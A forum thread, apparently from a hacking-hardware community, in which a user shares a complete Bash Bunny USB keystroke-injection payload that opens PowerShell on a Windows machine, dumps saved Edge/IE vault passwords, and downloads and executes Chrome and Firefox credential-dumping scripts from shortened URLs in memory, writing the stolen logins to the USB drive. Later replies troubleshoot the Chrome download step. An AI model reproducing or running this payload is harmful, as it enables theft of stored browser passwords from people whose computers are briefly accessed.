Jump to content

Recommended Posts

Posted
13 minutes ago, illwill said:

Was thinking of ways to dump browsercreds without the use Nirsoft programs, so screwing around with some powershell and some scripts i found that dump creds from Edge(IE)/Chrome/FireFox. I combined them into a HID attack that uses powershell to webdl the scripts into memory and execute and store the results \loot\BrowserCreds\%computername%.txt. 

Tested on Win10 with Delays that worked for my laptop , so may need adjusting, let me know of any errors you come across

https://raw.githubusercontent.com/xillwillx/BashBunny/master/BrowserCreds.txt


#!/bin/bash
#
# Title:         BrowserCreds
# Author:        illwill
# Version:       0.1
#
# Dumps the stored plaintext Browser passwords from Windows boxes downloading a Powershell script
# then stashes them in /root/udisk/loot/BrowserCreds/%ComputerName%
# Credits to these guys for their powershell scripts:
# https://github.com/sekirkity/BrowserGather BrowserGather.ps1
# https://github.com/EmpireProject/Empire    Get-FoxDump.ps1

#script 
# Blue...............Running Script
# Purple.............Got Browser Creds


LED R 200
LOOTDIR=/root/udisk/loot/BrowserCreds
mkdir -p $LOOTDIR

ATTACKMODE HID STORAGE
LED B 200

# wait 6 seconds for the storage to popup
Q DELAY 6000
Q GUI r
Q DELAY 100
Q STRING POWERSHELL
Q ENTER
Q DELAY 500
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100

#Dump Credential Vault (I.E./Edge)
Q STRING \$ClassHolder \= \[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType\=WindowsRuntime\]\;
Q STRING \$VaultObj \= new-object Windows.Security.Credentials.PasswordVault\; \$VaultObj.RetrieveAll\(\) \| 
Q STRING foreach \{ \$_.RetrievePassword\(\)\; \$_ \} \|
Q STRING select Resource, UserName, Password \| Sort-Object Resource \| ft -AutoSize \| Out-File \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100

#Dump Chrome Creds
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nea8tb\'\)\; Get-ChromeCreds \| ft -AutoSize \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
Q DELAY 2000


#Open 32bit powershell and Dump Firefox Creds
Q GUI r
Q DELAY 100
Q STRING \%SystemRoot\%\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Q ENTER
Q DELAY 2000
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \|  Select-Object -ExpandProperty DriveLetter\)
Q ENTER
Q DELAY 100
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File -Append \$Bunny\\loot\\BrowserCreds\\\$env:computername.txt
Q ENTER
Q DELAY 100
Q STRING exit
Q ENTER
LED R B 200
sync

 

Cool script @illwill but It's prefered to use

sync

before

LEDding

 

  • 1 month later...
Posted

Hello, i have this problem : 

Get-ChromeCreds : Le terme «Get-ChromeCreds» n'est pas reconnu comme nom d'applet de commande, fonction, fichier de
script ou programme exécutable. Vérifiez l'orthographe du nom, ou si un chemin d'accès existe, vérifiez que le chemin
d'accès est correct et réessayez.
Au caractère Ligne:2 : 73
+ ... ent).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds | ft Us ...
+                                                   ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Get-ChromeCreds:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

So, i isolated the probleme :  this line :  "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2nea8tb'); Get-ChromeCreds"

And its working perfectly.

But not with the script. Little translation, it says that Get-ChromeCreds is not a valid function, which i think means he failed to download. But idk why its working when i execute the line myself, and not when the script does it. Thx for help :)

 

  • 3 weeks later...
Posted

I think I'm having the same issue as the comment above, but I'm unsure how to fix it. Successfully continuing past the IEX string fails. The image below displays the problem.

Would be graterful for any help in finding a solution. Thanks, guys.

 

3R40ffg.png

  • 3 weeks later...
Posted

if you go to the github, dumpcreds 2.2 is in the pull request section and it works great for browser creds. :)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...